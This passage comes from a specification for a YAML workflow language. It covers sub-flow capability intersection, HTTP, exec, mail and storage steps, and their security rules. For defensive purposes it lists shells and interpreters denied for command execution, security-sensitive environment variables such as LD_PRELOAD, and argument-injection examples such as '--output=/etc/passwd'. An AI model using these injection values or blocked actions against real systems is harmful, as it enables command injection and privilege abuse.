    result: { user_list: =RESULT.rows }
```

**Standard DB operations:** `query`, `execute`, `scalar`, `batch`.

**Inline service calls in CEL:** `SERVICES.<alias>.<operation>(<params-map>)`. No retry, circuit breaker, or streaming. Use for simple lookups and conditions. SA-SVC-9, SA-SVC-10 apply. Inline CEL service calls MUST have an engine-configurable default timeout (default: 5 seconds, configurable maximum: 30 seconds). Calls exceeding the timeout MUST raise `TimeoutError`. Inline CEL service calls MUST be subject to the flow-level or step-level rate limit when configured. SA-SVC-11 (WARN) flags inline CEL service calls inside loop bodies (`forEach`, `while`, `repeat`) — use an explicit `call` action step for resilient service invocation.

**Query safety:** Service providers that accept SQL or query parameters SHOULD enforce parameterized queries. The engine does not validate service-specific query languages.

#### `run` -- Sub-flow Invocation

```yaml
- run:
    flow: "validation/check-content.flowmarkup.yaml"
    params: { text: =claude_result }
    result: { is_valid: =RESULT.is_valid }
```

**Path resolution:** Relative paths are resolved from the calling flow's directory. Absolute paths (starting with `/`) and URLs are used as-is.

**`flow: CURRENT`** -- self-invocation for recursion. The flow's own `requires:` applies; effective capabilities equal the caller's capabilities. `condition:` guard REQUIRED to avoid infinite loops (SA-RUN-9). The engine MUST enforce a maximum recursion depth (default: 100). Exceeding this limit raises `StackOverflowError` (non-retryable).

**`integrity:`** -- SRI-style hash (`sha256-<base64>`, `sha384-<base64>`, `sha512-<base64>`).

##### Capability Security Model

Every flow MUST declare `requires:`. There is no implicit capability inheritance, no same-origin vs cross-origin distinction, and no `capDrop:` blocklist.

**Capability resolution rule (single rule):**

```
effective = requires(sub-flow) ∩ capabilities(caller) ∩ cap(run-step, if present)
```

The sub-flow receives the intersection of:
1. What it declares in `requires:` (what it needs)
2. What the caller has (monotonic decrease)
3. Any further restrictions from `cap:` on the `run:` step

If the sub-flow's `requires:` includes a capability the caller does not have, the engine raises `MissingCapabilityError` at load time (SA-RUN-5).

**`cap:` on `run:` steps:** Object form provides per-category restrictions — unstated categories default to NONE. `cap: INHERIT` is an explicit opt-in to pass all caller capabilities through (sub-flow still bounded by its own `requires:`). Equivalent to omitting `cap:` but documents intent.

**Per-category `INHERIT`:** `cap: { <CATEGORY>: INHERIT }` on `run:` steps forwards the caller's entire grant for that category to the sub-flow. This distinguishes two concepts: **access rights** (what the sub-flow can use, computed as `requires ∩ given`) vs **forwarding rights** (`INHERIT` = the caller's entire granted set for that category is forwarded, not just what the sub-flow declares in `requires:`). Applies to all non-boolean categories: `SECRET`, `EXEC`, `REQUEST`, `MAIL`, `ENV`, `CONTEXT`, `GLOBAL`, `RESOURCES`, `STORAGE`, `SSH`. `requires: { SECRET: INHERIT }` is NOT valid — flows MUST enumerate the specific secrets they access. `INHERIT` is only valid on `cap:` (the forwarding side), never on `requires:` (the declaration side).

**Security advisory:** `cap: { EXEC: INHERIT }` and `cap: { SSH: INHERIT }` forward shell access to the sub-flow. Unless the sub-flow is verified with `integrity:`, prefer explicit capability enumeration:
```yaml
cap:
  EXEC: [specific-command-1, specific-command-2]
  SSH: [{host: specific-host, commands: [specific-cmd]}]
```
SA-CAP-4 (ERROR) rejects EXEC/SSH INHERIT on run: steps without integrity: verification.

**cap:INHERIT audit requirement.** Use of `cap: { <CATEGORY>: INHERIT }` MUST generate an audit log entry. Static analysis MUST emit SA-CAP-5 (WARN) for every `INHERIT` grant. Flows using `INHERIT` SHOULD document the security rationale in a comment. When a `run` step uses `cap: INHERIT` (full capability pass-through), the engine MUST log an audit event at WARNING level indicating that the sub-flow receives the caller's full capability set. Static analysis rule SA-RUN-18 (severity WARN) MUST flag all uses of `cap: INHERIT` and recommend explicit capability restriction. SA-CAP-5 (WARN) MUST additionally flag each per-category `INHERIT` grant (e.g., `cap: { SECRET: INHERIT }`, `cap: { EXEC: INHERIT }`) individually, as each category carries distinct risk. `cap: INHERIT` on `run:` steps MUST be rejected at static analysis time with ERROR severity (SA-CAP-3). In relaxed security mode, engines MAY downgrade to WARN with explicit operator opt-in. Any `run:` step using `cap: INHERIT` MUST include `integrity:` for remote flows. *(CWE-250: Execution with Unnecessary Privileges)*

**`flow: CURRENT`** — self-recursion still works. The flow's own `requires:` applies. Effective capabilities = caller's capabilities (since `requires` is the same flow).

**Capability categories:**

| Category | Granularity | Default |
|---|---|---|
| `ENV` | Per-variable array | Deny |
| `CONTEXT` | Per-key array, or `{read: [...], write: [...]}` | Deny |
| `GLOBAL` | Per-key array, or `{read: [...], write: [...]}` | Deny |
| `SERVICES` | Per-service array, typed object, or remapping object | Deny |
| `SUBFLOWS` | Boolean | Deny |
| `REQUEST` | Per-origin pattern array | Deny |
| `EXEC` | Per-executable array | Deny |
| `MAIL` | Boolean or per-recipient array | Deny |
| `RUNTIME` | Boolean | Deny |
| `SECRET` | Per-secret array | Deny |
| `RESOURCES` | Named array or typed object | Deny |
| `STORAGE` | Per-alias or per-URL-pattern, per-operation, optional per-path | Deny |
| `SSH` | Per-alias or per-host with per-command allowlist (map-only) | Deny |

Example: `cap: { SECRET: ["api_token", "db_credentials"], EXEC: ["python3"], ENV: ["API_KEY"] }`

**`STORAGE` capability:** Keys are **aliases** (engine-provisioned or parent-flow-provisioned names matching `^[a-z][a-z0-9_]*$`) or **URL patterns** (starting with a known scheme: `s3://`, `sftp://`, `smb://`, `ftp://`, `file://`). Three forms with progressive granularity:

```yaml
requires:
  # Form 1: Array of aliases or URL patterns (full access to all operations)
  STORAGE: [data, backup]                                  # aliases
  STORAGE: ["s3://my-bucket/*", "sftp://backup.host/*"]    # URL patterns
  STORAGE: [data, "s3://other-bucket/*"]                   # mixed

  # Form 2: Per-key with operation restrictions
  STORAGE:
    data: [get, put, list]                                 # alias + ops
    "s3://my-bucket/public/*": [get, list]                 # URL pattern + ops
    "sftp://backup.host/backups/*": [put, mkdir]           # URL pattern + ops

  # Form 3: Per-alias with operations + path prefixes (alias keys only)
  STORAGE:
    data:
      operations: [get, list, info, exists]
      paths: ["public/*", "reports/*"]                     # path-prefix patterns
    backup:
      operations: [put]
      paths: ["/uploads/*"]
```

Key resolution: if a key starts with a known scheme (`s3://`, `sftp://`, `smb://`, `ftp://`, `file://`) it is a **URL pattern** — scheme+authority match exactly, `*` suffix matches any path prefix. Otherwise it is a **bare alias** (must match `^[a-z][a-z0-9_]*$`). Path prefix in URL patterns subsumes the `paths:` restriction — for alias keys, the `{operations, paths}` object form is retained. Path prefix matching: `"public/*"` matches any path starting with `public/`. Paths without `*` match exactly. `transfer` requires both source and target URLs/aliases in `STORAGE` — source with `get` (or full access), target with `put` (or full access).

**`cap.STORAGE`** on `run:` steps — supports alias provisioning, forwarding, and restriction:

```yaml
- run:
    flow: "etl/process.flowmarkup.yaml"
    cap:
      # Full forward
      STORAGE: INHERIT

      # Provision aliases for the sub-flow
      STORAGE:
        data: "s3://prod-bucket"           # provision alias → literal URL
        backup: =SFTP_URL                  # provision alias → CEL-resolved URL
        archive: archive                   # forward engine alias as-is

      # Restrict by URL pattern
      STORAGE:
        "s3://prod-bucket/public/*": [get, list]

      # Mixed aliases + URL patterns
      STORAGE:
        data: [get, list]                  # forward alias, restrict ops
        "sftp://backup.host/*": [put]      # URL pattern + ops
```

Effective capability: `effective = requires(sub-flow) ∩ cap(run-step) ∩ capabilities(caller)` — same intersection rule as all other categories.

**`SSH` capability:** Keys are **aliases** (matching `^[a-z][a-z0-9_]*$`) or **hostnames** (containing `.` or `:`). Map-only form — a command allowlist is always required. There is no array-only form (unlike `EXEC` or `STORAGE`):

```yaml
requires:
  SSH:
    prod_server: [rsync, df, deploy.sh]        # alias
    "staging.example.com": [deploy.sh]          # hostname
```

The engine validates `ssh.command` against the per-alias or per-host allowlist (SA-SSH-2). SA-SSH-3 (ERROR) rejects interpreter names in the allowlist.

**`cap.SSH`** on `run:` steps — supports alias provisioning, forwarding, and restriction:

```yaml
- run:
    flow: "deploy/release.flowmarkup.yaml"
    cap:
      SSH: INHERIT

      # Or provision/remap
      SSH:
        prod: "prod.example.com"               # provision alias → hostname
        staging: staging                        # forward engine alias

      # Or restrict
      SSH:
        prod: [deploy.sh]                      # forward alias, restrict commands
```

**MAIL recipient restrictions:** `MAIL: ["@example.com"]` allows sending to any address at `example.com`. `MAIL: ["admin@external.org"]` allows one exact address. `MAIL: ["@example.com", "admin@external.org"]` allows both. `@domain.com` matches exact domain only (no subdomains, case-insensitive). Engine MUST validate all `to:`/`cc:`/`bcc:` addresses against the allowlist before sending; throws `MissingCapabilityError` on violation.

##### FlowHandle and Event Source Enforcement

**`handle:` on `run:` steps** creates a local read-only binding of type `FlowHandle`:

```yaml
- run:
    flow: "payment-processor.flowmarkup.yaml"
    handle: payment_proc
    async: true
    params: { order_id: =order_id }
```

- `handle:` follows variable naming rules (snake_case)
- Read-only — cannot be overwritten by `set:`
- Cannot be logged, returned, emitted, or yielded (non-exportable by design)
- Available on both sync and async `run:` steps (most useful with `async: true`)

**FlowHandle properties (CEL, read-only):**

| Property | Type | Description |
|---|---|---|
| `handle.status` | string | `RUNNING`, `COMPLETED`, `FAILED`, `CANCELLED` |
| `handle.flow` | string | Canonical flow location (FlowRef path) |
| `handle.instance_id` | string | Unique instance identifier (globally unique within the engine deployment, stable across checkpoint resume, printable ASCII, max 128 bytes; UUID v4 RECOMMENDED, format is engine-specific) |

Status is read-only and has no side effects — safe in any CEL context.

**Auto-stringify:** FlowHandle auto-stringifies to its canonical flow location (`handle.flow`). This enables direct use in string contexts: `log: "Running: " + payment_proc` produces `"Running: payment-processor.flowmarkup.yaml"`.

**`source:` on `waitFor:`** — engine-level source filter:

```yaml
- waitFor:
    event: payment_completed
    source: =payment_proc
    timeout: 5m
    capture: [tx_id]
```

- Engine only delivers events from the matching source instance (and its transitive sub-flow descendants)
- Pre-delivery filtering — the event never reaches the flow if source doesn't match
- `source:` evaluates to a `FlowHandle` (instance-level) or `string` (flow-path filter matching `EVENT.SOURCE`)
- When omitted, all events of the matching type are delivered (current behavior)

**`EVENT.SOURCE` identity:** `EVENT.SOURCE` is engine-stamped — it cannot be overridden by the emitting flow. It evaluates to the canonical flow location string (`flow_id`) extracted from the verified source structure (see GLOBAL event signature format above). For GLOBAL events, the engine verifies the full cryptographic envelope before exposing the flow identity as `EVENT.SOURCE`. For instance-level filtering (specific running instance), use a FlowHandle: `source: =handle`. For flow-identity filtering (any instance of a specific flow), use a string: `source: "path/to/flow.flowmarkup.yaml"`.

Static analysis: SA-HANDLE-1 (WARN) when handle is declared but never used. SA-HANDLE-2 (ERROR) when handle name conflicts with vars/const/forEach.as. SA-HANDLE-3 (ERROR) when FlowHandle used at output boundary. SA-EVENT-11 (ERROR) when `waitFor:` with `scope: GLOBAL` and no `source:` filter.

**Full RACE orchestration example** — async sub-flow with source-verified event wait and timeout guard:

```yaml
- run:
    flow: "payment-processor.flowmarkup.yaml"
    handle: payment_proc
    async: true
    params: { order_id: =order_id }

# Wait for payment result with source verification
- race:
    wait_result:
      - waitFor:
          event: payment_completed
          source: =payment_proc
          timeout: 5m
          capture: [tx_id]
    timeout_guard:
      - wait: 4m
      - cancel: =payment_proc
      - throw: { error: PaymentTimeoutError, message: "Payment timed out" }
```

##### Git Ref Pinning (`?ref=`)

Append `?ref=VALUE` to git-backed URLs. 7-40 hex chars = commit SHA (immutable). Mutable refs SHOULD pair with `integrity:` (SA-RUN-11). `?ref=` excluded from origin computation.

| Scheme | `//` required | Origin prefix |
|---|---|---|
| `github://` | Optional | `github://owner/repo/` |
| `gitlab://` | Required | `gitlab://group/.../project/` |
| `bitbucket://` | Optional | `bitbucket://workspace/repo/` |
| HTTPS `.git//` | Required | `https://host/repo.git/` |

**Credential resolution:** Engine-managed, MUST NOT appear in flow YAML. `FlowFetchError` on failure.

#### `request` -- HTTP Request

Requires `method:` and exactly one of `url:` (full URL) or `host:` (decomposed).

**Body forms:** `json` (auto Content-Type: application/json), `urlencoded`, `multipart`, `raw`, string shorthand.

**Authentication:** `auth.bearer` (engine prepends `Bearer `), `auth.basic` (engine base64-encodes).

> **Secret injection restriction.** `SECRET.*` values MUST NOT appear in `request.body`, `request.query`, or `request.url` fields. Secrets MUST be injected via `auth.bearer`, `auth.basic`, `request.headers` (for custom API key headers), or service `params:` to engine-managed services. Static analysis rule SA-SECRET-26 (ERROR) MUST reject `SECRET.*` references in request body, query, or URL fields. `request.headers` is a valid injection point for secrets — custom authentication headers (e.g., `X-API-Key`, `Ocp-Apim-Subscription-Key`) are legitimate and preferred over query parameters. SA-SECRET-18 (ERROR) separately prohibits secrets in query parameters. *(CWE-200)*

**Response output:** `status`, `headers`, `body`, `cookies`.

**`parseAs:`** -- optional response body content type for auto-parsing. Two forms:

- **String form:** bare constant (`JSON`, `YAML`, `XML`, `CSV`, `TSV`, `TEXT`, `BINARY`) or CEL `=` expression.
- **Object form:** `{ $kind?: JSON|..., $type?: ..., $name?: ... }` — attaches metadata to `RESULT.body` (e.g., `$name:` for a filename, `$type:` for a semantic MIME type like `application/vnd.api+json`). `$kind` also acts as the parse format when present.

When present, `RESULT.body` is auto-parsed: MAP for JSON/YAML/XML (XML uses the XML-to-MAP mapping convention from §1.3), ARRAY for CSV/TSV, STRING for TEXT, bytes for BINARY. When absent, `RESULT.body` remains a raw string. Parse failure raises `ParseError` with `ERROR.DATA.field: "body"`. Character encoding: HTTP `Content-Type` charset parameter provides the encoding (detection priority from §2.4 Character Encoding Detection applies). SA-REQ-13 (WARN) warns when `parseAs` is combined with `async: true` (async discards the response). SA-REQ-14 (INFO, engine-level) suggests `parseAs` when `RESULT.body.decode(FORMAT)` is used.

**`expect:`** -- validate status/contentType before result mapping. Mismatch throws `HttpError`.

**Auto-throw:** 4xx/5xx -> `HttpError` by default. When `status` is mapped in `result:`, auto-throw is suppressed.

**Options:** `followRedirects` (default true), `connectTimeout`, `readTimeout`, `timeout`, `maxResponseSize` (engine-configurable default).

**Redirect origin enforcement:** When the effective `REQUEST` capability is not `INHERIT`, the engine MUST validate each HTTP redirect target against the effective REQUEST allowlist before following. Redirects to origins not in the allowlist MUST be rejected with `ConnectionError`. This prevents SSRF attacks where an allowed origin redirects to internal or unauthorized endpoints. The engine MUST apply DNS resolution and private/internal IP validation (same ranges as §2.4 schema fetch) to each redirect target before following. Relative redirects (scheme-relative `//host/path` or path-relative `/path`) MUST be resolved against the original request URL and then validated. Maximum redirect chain depth: 10 (configurable). Each redirect hop counts toward the step's `timeout:`.

**Timeout hierarchy:** `connectTimeout` -> `readTimeout` -> `timeout` (entire step).

**Proxy:** Engine reads `HTTP_PROXY`, `HTTPS_PROXY`, `NO_PROXY` at startup. Flows cannot override per-step.

**Errors:** `ConnectionError`, `HttpError`, `TLSError`, `TimeoutError`.

**Response size limit:** The engine MUST enforce a configurable maximum response body size (default: 10 MB, maximum: 100 MB). Responses exceeding the limit raise `ResourceExhaustedError`. The limit applies to the decompressed response body. Streaming responses (`onYield:` / `$yields`) are exempt from the total size limit but each chunk is subject to the per-instance memory limit.

**Streaming:** Supports `onYield:` / `$yields` for SSE and chunked responses.

SA-REQ-11 (ERROR): Auth (`basic` or `bearer`) over `http://` scheme MUST be rejected at static analysis time (SA-REQ-11, ERROR), except when the request URL targets a local address: `localhost`, `127.0.0.0/8`, `::1`, `[::1]`, `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`. For local addresses, SA-REQ-11 severity is INFO. The engine-level `request.requireTlsForAuth` configuration (default: `true`) MAY override this exemption to enforce TLS even for local addresses.

**SSRF prevention for CEL-computed URLs.** When `request.url` is derived from CEL expressions or user input, engines MUST validate the resolved URL against an allowlist of permitted schemes (default: `https`), hosts, and port ranges. Private/internal IP ranges (RFC 1918, RFC 4193, link-local, loopback) MUST be denied by default. DNS rebinding protection SHOULD be implemented by resolving the hostname and re-checking the IP after resolution. The engine MUST evaluate the expression and validate the resulting URL before initiating the HTTP request:
1. The resolved URL scheme MUST be `http` or `https` only. Other schemes (`file`, `ftp`, `gopher`, `dict`, `ldap`) MUST be rejected. The default permitted scheme SHOULD be `https` only — engines MUST require explicit opt-in to allow `http`.
2. The resolved hostname MUST be validated against the REQUEST capability's allowed-origin list. The engine MUST also validate the port against a configurable allowed port range (default: 443 for `https`, 80 for `http`).
3. The resolved IP address (after DNS resolution) MUST be checked against private/reserved ranges (RFC 1918: `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`; RFC 4193: `fc00::/7`; link-local: `169.254.0.0/16`, `fe80::/10`; loopback: `127.0.0.0/8`, `::1`; CGNAT: `100.64.0.0/10`; IPv4-mapped IPv6: `::ffff:0:0/96`; current network / self-reference: `0.0.0.0/8`; documentation prefix: `2001:db8::/32`). This check MUST occur after DNS resolution to prevent DNS rebinding.
4. DNS rebinding protection: the engine MUST resolve the hostname, validate the resolved IP against private/internal ranges, pin the resolution result, and use the pinned IP for the actual connection. This prevents TOCTOU DNS rebinding attacks where the hostname re-resolves to an internal IP between validation and connection.
5. For redirect responses (301, 302, 307, 308), ALL of the above checks MUST be re-applied to the redirect target URL. The engine MUST enforce a maximum redirect chain length of 10.
Static analysis rule SA-REQ-15 MUST flag `request.url` expressions that incorporate user-controlled input without validation. *(CWE-918: Server-Side Request Forgery)*

#### `exec` -- System Command Execution

Runs a process directly without shell interpretation. Capability-gated.

**`command:`** is NOT CEL -- static plain string for capability validation. Schema-level enforcement: the `command` field rejects `=`-prefixed strings via the `^[^=]` pattern constraint. SA-EXEC-7 (shell metacharacters) provides a parallel structural enforcement; SA-EXEC-2 (command not in allowlist) provides additional static analysis protection.

| Property | Type | Description |
|---|---|---|
| `command` | plain string | REQUIRED. Executable name or path. |
| `args` | array or CEL | Each string item is CEL; non-strings pass through. |
| `workingDir` | CEL | Working directory. |
| `env` | object | Additional env vars. Merged with inherited. |
| `stdin` | CEL | Data written to stdin (once, pipe closed). |
| `parseAs` | string or object | Parse format for stdout. String: bare constant or CEL. Object: `{ $kind?, $type?, $name? }`. Default: `TEXT`. |
| `charset` | plain | Character encoding for stdout. Overrides auto-detection. |
| `stderrCharset` | plain | Character encoding for stderr. Overrides auto-detection. |

**Output:** `RESULT.stdout` (stdout content, auto-decoded via `parseAs:`), `RESULT.stderr` (always TEXT), `RESULT.exitCode`.

**Auto-decode:** `JSON`/`YAML`/`XML` -> structured CEL value. `CSV`/`TSV` -> list of maps (each row keyed by column headers from the first line). `TEXT` -> string. `BINARY` -> bytes. For all text-based types, the engine applies character encoding detection (see §2.4) to stdout bytes before format-specific parsing. Auto-decode failure (e.g., invalid JSON when `parseAs: JSON`) raises `ParseError` with `ERROR.DATA.field: "stdout"`. Stderr is always TEXT — decode manually via CEL `decode()` if structured stderr is needed.

**Errors:** `ExecError` (non-zero exit, when `exitCode` not mapped), `MissingCapabilityError`, `TimeoutError`.

**Auto-throw suppression:** When `exitCode` is mapped, `ExecError` is not thrown.

Streaming stdout supported via `onYield:` / `$yields`.

SA-EXEC-10 (ERROR): rejects flows when the `EXEC` allowlist contains interpreter names (`python3`, `node`, `ruby`, `bash`, `sh`, `perl`, `php`) — effectively grants arbitrary code execution.

**Argument injection prevention.** Arguments derived from CEL expressions MUST NOT begin with a dash (`-`) unless explicitly allow-listed in the exec command's argument schema. Engines MUST reject or escape leading dashes to prevent argument injection (e.g., `--flag` injection via user input). When `args` items are derived from CEL expressions that reference user-controlled input, the engine MUST reject any argument that begins with a dash (`-`) unless the argument appears in the step's `command` allowlist as a permitted flag. This prevents attackers from injecting command-line flags (e.g., `--output=/etc/passwd`, `-exec`) through user input. Engine MUST insert a `--` end-of-options separator before user-derived arguments by default. The engine MUST provide a configurable per-command exception list for commands that do not support `--` (e.g., commands that treat `--` as a literal argument). When a command is not in the exception list, `--` insertion is mandatory. Static analysis rule SA-EXEC-12 MUST flag CEL-derived args that do not pass through a validation function or are not constrained by a `$format` annotation. *(CWE-88: Improper Neutralization of Argument Delimiters in a Command)*

**Extended interpreter denylist.** The following interpreters and shells MUST be denied in both `exec.command` and `ssh.command` allowlists: `sh`, `bash`, `zsh`, `fish`, `ksh`, `csh`, `tcsh`, `dash`, `powershell`, `pwsh`, `cmd`, `cmd.exe`, `python`, `python3`, `ruby`, `perl`, `node`, `php`, `lua`, `tclsh`, `wish`, `osascript`, `expect`, `nohup`, `env`, `xargs`, `eval`, `java`, `javaw`, `dotnet`, `mono`, `groovy`, `scala`, `kotlin`, `swift`, `deno`, `bun`, `cscript`, `wscript`, `mshta`, `regsvr32`, and any executable containing `script` as a substring of the filename (case-insensitive). This denylist applies to both `exec.command` and `ssh.command` — SA-EXEC-10 enforces it for EXEC allowlists and SA-SSH-3 enforces it for SSH allowlists. Engines MAY extend this denylist via configuration. *(CWE-78: Improper Neutralization of Special Elements used in an OS Command)*

**Environment variable injection prevention.** Environment variable names derived from user input MUST be validated against a safe pattern (`[A-Z_][A-Z0-9_]*`, max 256 chars). Environment variable values derived from user input MUST NOT contain null bytes. Engines MUST deny setting security-sensitive environment variables (`LD_PRELOAD`, `LD_LIBRARY_PATH`, `DYLD_LIBRARY_PATH`, `PATH`, `HOME`, `SHELL`, `IFS`, `CDPATH`, `ENV`, `BASH_ENV`, `PYTHONPATH`, `NODE_PATH`, `RUBYLIB`, `PERL5LIB`, `CLASSPATH`) from user-controlled sources. When `exec.env` values are derived from CEL expressions referencing user-controlled input, the engine MUST validate that environment variable names conform to `^[A-Z_][A-Z0-9_]{0,254}$` and that values do not contain null bytes. Static analysis rule SA-EXEC-13 MUST flag `env` entries where the key or value references user-controlled input without validation. *(CWE-426: Untrusted Search Path)*

#### `mail` -- Email Sending

Capability-gated (deny-by-default). Engine SMTP settings are opaque.

| Property | Required | Description |
|---|---|---|
| `from:` | No | Sender address (CEL expression). Falls back to engine default when omitted. |
| `to`/`cc`/`bcc` | At least one | Recipients |
| `subject` | Yes | Subject line (CEL) |
| `body` | No | String shorthand or `{text:, html:}` |
| `attachments` | No | Bare variable ref or `{data:, name:, contentType:, inline:, contentId:}`. `contentType:` and `name:` override the value's `$type`/`$kind` and `$name` metadata — omit them when the value already carries the correct type (e.g. after `.encode(CSV)`). |
| `headers` | No | Custom headers |
| `priority` | No | HIGH / NORMAL / LOW |
| `smtp` | No | SMTP override (merged with engine defaults) |

**Output:** `message_id`, `timestamp`.

**Body optionality:** `body` is optional. An email with subject and recipients but no body is valid per RFC 5322.

**Recipient restrictions:** When the effective `MAIL` capability is an array (e.g., `MAIL: ["@example.com"]`), the engine MUST validate all `to:`/`cc:`/`bcc:` addresses against the allowlist before sending. `@domain.com` matches any local-part at that exact domain (case-insensitive domain, no subdomain matching). `user@domain.com` matches that exact address. Throws `MissingCapabilityError` on violation.

**Sender validation (`from:`):** The `from:` field accepts a CEL expression for the sender address. Engine MUST restrict `from:` to addresses authorized by SMTP configuration (SPF/DKIM/DMARC alignment). SA-MAIL-13 emits an informational note when `from:` is explicitly set.

**HTML body security:** The engine MUST auto-escape `{{ }}` interpolation results in `body.html:` — all interpolated values have `<`, `>`, `&`, `"`, `'` replaced with their HTML entity equivalents before insertion. This prevents script injection from user-controlled data by default. To bypass auto-escaping for pre-sanitized content, use `htmlRaw(string) → HtmlSafeString` which marks the value as safe. `htmlEscape(string) → string` remains available for explicit use in CEL expressions (e.g., escaping values before string concatenation). SA-MAIL-14 (INFO) notes when `{{ }}` interpolation appears in `body.html:`. `body.text:` is plain text — no HTML parsing, safe from injection.

**`htmlRaw(string) → HtmlSafeString`** — marks a string as pre-sanitized HTML, bypassing auto-escaping in `body.html:` interpolation. **Security warning:** `htmlRaw()` MUST NOT be called on user-controlled input without prior sanitization — it bypasses the XSS protection that `{{ }}` auto-escaping provides. SA-MAIL-15 (ERROR) flags `htmlRaw()` on user-derived values. SA-MAIL-16 (ERROR) flags `htmlRaw()` used outside `body.html:` context. See R-SEC-11.

**`htmlEscape(string) → string`** — escapes `<`, `>`, `&`, `"`, `'` to their HTML entity equivalents. Available for manual use in CEL expressions.

- **`htmlSanitize(html [, policy]) → string`** — Performs allowlist-based HTML sanitization. Default policy (`"basic"`): allows `<b>`, `<i>`, `<em>`, `<strong>`, `<a href>`, `<p>`, `<br>`, `<ul>`, `<ol>`, `<li>`, `<h1>`–`<h6>`, `<blockquote>`, `<code>`, `<pre>`. `"strict"` policy: text-only, strips ALL tags. `"rich"` policy: adds `<table>`, `<tr>`, `<td>`, `<th>`, `<img src alt>`, `<div>`, `<span>`. All policies strip event handlers (`on*`), `javascript:` URIs, `data:` URIs (except `data:image/png`, `data:image/jpeg`, `data:image/gif`, `data:image/webp`, and `data:image/avif` in `"rich"` — `data:image/svg+xml` is excluded because SVG can contain embedded JavaScript; `data:` URIs MUST NOT exceed 1 MB), CSS expressions, and `<script>`/`<style>`/`<iframe>` tags. **Explicit strip list (all policies):** `<script>`, `<style>`, `<iframe>`, `<frame>`, `<frameset>`, `<object>`, `<embed>`, `<applet>`, `<form>`, `<input>`, `<button>`, `<select>`, `<textarea>`, `<link>`, `<meta>`, `<base>`, `<svg>`, `<math>`, `<template>`, `<slot>`, `<portal>`, `<dialog>` (when containing interactive content), and all custom elements (tags containing a hyphen). **SVG exclusion:** `<svg>` and all SVG namespace elements (`<svg:*>`) are stripped in ALL policies including `"rich"` — SVG enables script execution via `<svg onload>`, `<foreignObject>`, `<animate>`, and `<set>` elements, making safe SVG sanitization infeasible without a dedicated SVG sanitizer. Engines that wish to support SVG MUST provide a separate `svgSanitize()` function with its own allowlist. **Attribute strip list (all policies):** all `on*` event handler attributes, `style` attributes (except in `"rich"` policy where `style` is allowed but `expression()`, `url()`, `import`, and `behavior` values are stripped), `srcdoc`, `formaction`, `xlink:href`, `data-*` attributes (except in `"rich"` policy). **Reference implementation:** Engines SHOULD implement `htmlSanitize()` using DOMPurify (JavaScript), Bleach/nh3 (Python), or OWASP Java HTML Sanitizer — custom regex-based sanitizers are NOT acceptable. *(CWE-79)*

**MUST:** When `htmlRaw()` receives user-controlled input, the input MUST be passed through `htmlSanitize()` first. The recommended safe pattern is:
```yaml
body.html: =htmlRaw(htmlSanitize(user_input))
```
Direct use of `htmlRaw()` on unsanitized user input is a specification violation (SA-MAIL-15 ERROR).

**Errors:** `MailError`, `SmtpError`, `ConnectionError`, `TimeoutError`, `TLSError`, `RateLimitError`, `AddressError`, `AuthenticationError`, `ConfigurationError`, `MissingCapabilityError`.

**User-controlled recipient restriction.** When `mail.to`, `mail.cc`, or `mail.bcc` values are derived from user input or CEL expressions, engines MUST validate recipients against a configured allowlist of permitted domains or addresses. Open-relay prevention: engines MUST reject recipient addresses that do not match the allowlist. When `to`, `cc`, or `bcc` fields contain CEL expressions that reference user-controlled input, the engine MUST validate each resolved email address against the `MAIL` capability's domain allowlist BEFORE sending. If the MAIL capability is declared as `true` (unrestricted), static analysis rule SA-MAIL-20 MUST emit a WARNING when recipient fields derive from user input, as this enables the flow to be used as an open mail relay. In strict security mode, SA-MAIL-20 MUST be elevated to ERROR severity, requiring explicit domain allowlists for any flow with user-derived recipients. Engines MUST enforce a per-step recipient limit (default: 50) and a per-flow-instance aggregate recipient limit (default: 200) to prevent abuse. *(CWE-79, CWE-183: Permissive List of Allowed Inputs)*

#### `storage` -- File Storage Operations

Performs file operations on engine-configured storage backends (S3, SFTP, SMB, FTP, local filesystem). Capability-gated (deny-by-default). The flow addresses backends by URL or provisioned alias. The engine resolves aliases and credentials (see [FLOWMARKUP-ENGINE.md](FLOWMARKUP-ENGINE.md) §5.4 items 26 and 40 for alias resolution and backend registration). If the engine does not support a storage backend type, it raises `UnsupportedProviderError` at flow load time.

**`url:`** -- storage target. Three forms: (1) **bare alias** — engine-provisioned or parent-flow-provisioned name (e.g., `url: data`), resolved from the STORAGE mapping; (2) **literal URL** with a known scheme (`s3://`, `sftp://`, `smb://`, `ftp://`, `file://`); (3) **CEL expression** (`=` prefix, must evaluate to a URL string at runtime). REQUIRED for all operations except `transfer` (which uses `source.url` and `target.url`). Resolution order: CEL (`=` prefix) → literal URL (known scheme prefix) → bare alias (matches `^[a-z][a-z0-9_]*$`). Supported URL schemes: `s3`, `sftp`, `smb`, `ftp`, `file`.

> **SSRF prevention for storage URLs.** When `storage.url` is a CEL expression, the engine MUST evaluate the expression and validate the resolved URL against the same SSRF prevention requirements as `request.url` (§4.3): scheme allowlisting, DNS rebinding protection, private IP range denial (RFC 1918/4193/link-local), and redirect enforcement. The `file://` scheme MUST be restricted to engine-configured root directories — resolved `file://` paths MUST NOT escape the configured root via symlinks, `..` segments, or canonicalization tricks. Static analysis rule SA-STORAGE-32 (ERROR) MUST flag `storage.url` CEL expressions that reference user-controlled input without URL validation. *(CWE-918: Server-Side Request Forgery)*

**`path:`** -- CEL expression for relative path within the storage endpoint. When both `url:` and `path:` are present, the engine appends `path` to the resolved URL (ensuring exactly one `/` separator). When only `url:` is present, the URL's path component is the full path.

**`operation:`** -- bare name. REQUIRED.

| Operation | Description | Requires |
|---|---|---|
| `get` | Download file content | read |
| `put` | Upload file content (creates parent dirs as needed) | write |
| `delete` | Delete file | write |
| `list` | List directory/prefix contents | read |
| `info` | Get file metadata (size, modified, etc.) | read |
| `exists` | Check if file exists | read |
| `mkdir` | Create directory | write |
| `copy` | Copy within same resolved URL authority | read + write |
| `move` | Move/rename within same resolved URL authority | read + write |
| `transfer` | Cross-storage streaming file transfer | read on source, write on target |

```yaml
- storage:
    _label_: "Human-readable"
    _id_: step_name
    url: data                       # bare alias (engine/parent-provisioned)
    url: "s3://bucket"              # literal URL
    url: =ENV.S3_URL                # CEL expression
    operation: get|put|delete|list|info|exists|mkdir|copy|move|transfer
    path: "<CEL expression>"        # optional, appended to resolved url
    data: "<CEL expression>"        # REQUIRED for put (file content to upload)
    parseAs: JSON|YAML|XML|CSV|TSV|TEXT|BINARY|CEL   # string or object; optional auto-parse for get
    # parseAs: {$kind: JSON, $type: ..., $name: ...}              # object form
